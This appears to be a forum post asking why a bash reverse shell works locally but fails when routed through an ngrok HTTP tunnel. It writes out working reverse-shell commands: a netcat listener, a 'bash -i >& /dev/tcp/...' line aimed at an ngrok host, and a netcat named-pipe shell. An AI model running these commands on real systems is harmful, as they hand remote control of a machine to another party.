I am able to get a reverse shell working locally over TCP, but failing to trigger it remotely over HTTP.
Locally over TCP:
- Attacker terminal runs netcat to listen for a connection over port 8000:
nc -vv -l 8000
- Target terminal sends an interactive bash shell to the attacker:
bash -i >& /dev/tcp/localhost/8000 0>&1;
- Success!
Remotely over HTTP:
- Attacker runs netcat to listen for a connection over port 8000:
nc -vv -l 8000
- Attacker runs ngrok to generate a web-facing IP:
./ngrok http --subdomain=example 8000
- Target runs an interactive bash shell:
bash -i >& /dev/tcp/example.ngrok.io/80 0>&1;
(using port 80 because it's HTTP) - The connection fails; I don't even see any incoming traffic showing up on ngrok.
I also tried using netcat on the target machine, which unfortunately had the same result: /bin/bash 0< /tmp/mypipe | nc 4444 1> /tmp/mypipe
(from this post)
Can anyone spot what I'm doing wrong?